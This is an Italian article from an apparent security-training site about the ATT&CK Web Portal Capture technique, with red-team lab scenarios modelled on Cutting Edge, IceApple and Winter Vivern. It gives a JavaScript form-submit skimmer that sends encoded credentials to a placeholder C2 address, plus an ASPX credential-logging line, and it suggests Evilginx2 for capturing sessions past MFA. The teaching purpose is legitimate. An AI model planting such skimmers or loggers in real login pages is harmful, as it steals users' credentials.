Iscriviti al webinar gratuito del 12 Maggio per diventare Forensic Analyst! Scopri di più
Corso Ethical Hacker: accedi alla promozione fino al 30 Aprile! Scopri di più
La tecnica Web Portal Capture consiste nell'iniettare codice malevolo all'interno di pagine di login esposte su Internet — portali VPN, webmail, SSO — per intercettare le credenziali degli utenti nel momento stesso in cui le digitano. Il meccanismo è subdolo: l'utente vede la pagina autentica, inserisce username e password, accede normalmente al servizio, ma nel frattempo i dati transitano verso un canale controllato dall'attaccante.
Questa tecnica si colloca a cavallo di due tattiche. In Collection (TA0009) rappresenta un metodo di raccolta dati dall'ambiente compromesso: l'avversario harvesta credenziali in tempo reale senza bisogno di esfiltrarle da un database. In Credential Access (TA0006) è uno strumento diretto per ottenere account e password validi, che poi abilitano movimenti laterali, persistenza tramite Valid Accounts e accesso continuo via External Remote Services.
L'attacco può manifestarsi in due fasi distinte della kill chain. Nella prima, l'attaccante sfrutta una vulnerabilità del portale esposto per modificare la pagina di login come vettore iniziale. Nella seconda — più insidiosa — un avversario che ha già ottenuto accesso amministrativo modifica il portale come meccanismo di backup per mantenere la persistenza anche se le credenziali iniziali vengono ruotate. I dati disponibili documentano 1 gruppo APT, 2 malware, 2 campagne e 1 mitigazione formalmente associati a questa tecnica.
La simulazione di Web Portal Capture in laboratorio richiede un portale di login controllato e la capacità di iniettare JavaScript o codice server-side che catturi le credenziali prima del submit legittimo. L'obiettivo del red teamer è dimostrare quanto sia semplice trasformare una pagina autentica in un collettore di credenziali una volta ottenuto accesso al filesystem del web server.
Scenario 1 — Injection JavaScript su portale VPN (simula Cutting Edge)
L'approccio più diretto replica ciò che è stato osservato nella campagna Cutting Edge (C0029): modificare il file JavaScript caricato dalla pagina di login per aggiungere un hook sull'evento di submit del form. In laboratorio, prepara un ambiente con un portale web su Apache o Nginx e un file di login HTML/JS.
Crea uno snippet JavaScript che intercetti il submit:
document.getElementById('loginForm').addEventListener('submit', function(e) { var creds = btoa(document.getElementById('user').value + ':' + document.getElementById('pass').value); new Image().src = '<server-C2-laboratorio>/collect?d=' + creds; });
Inietta questo codice nel file JavaScript originale del portale. Per simulare l'accesso amministrativo abusato, utilizza SSH con credenziali valide verso il server e modifica il file direttamente:
echo '' >> /var/www/html/login.html
Scenario 2 — Modifica server-side su IIS/OWA (simula IceApple)
Per replicare il comportamento di IceApple (S1022) su OWA, lavora in un lab con Exchange Server e modifica la pagina di autenticazione ASPX. Inserisci un code-behind che logga le credenziali in un file locale:
File.AppendAllText(@"C:\Windows\Temp\auth.log", username + ":" + password + Environment.NewLine);
Questo approccio simula il credential logger OWA di IceApple senza componenti di rete.
Scenario 3 — Phishing portal con cattura credenziali (simula Winter Vivern)
Per replicare l'approccio di Winter Vivern (G1035), utilizza Gophish (open source) o Evilginx2 (open source) per creare una pagina di login che mima un portale governativo. Evilginx2 funziona come reverse proxy e cattura sia credenziali sia token di sessione, consentendo il bypass MFA in contesti di test autorizzato.
evilginx2 -p phishlets
Dopo aver configurato il phishlet appropriato, il tool cattura le credenziali in transito e le memorizza nel proprio database locale.
Per la validazione dell'intera catena, verifica che WARPWIRE (S1116) rappresenta l'approccio più aggressivo: cattura credenziali durante il logon web per accedere ad applicazioni layer 7 come RDP, dimostrando che il vettore non si limita al furto di password ma abilita accesso diretto ai servizi interni.
Scarica la guida gratuita e segui il percorso corretto fin dal primo passo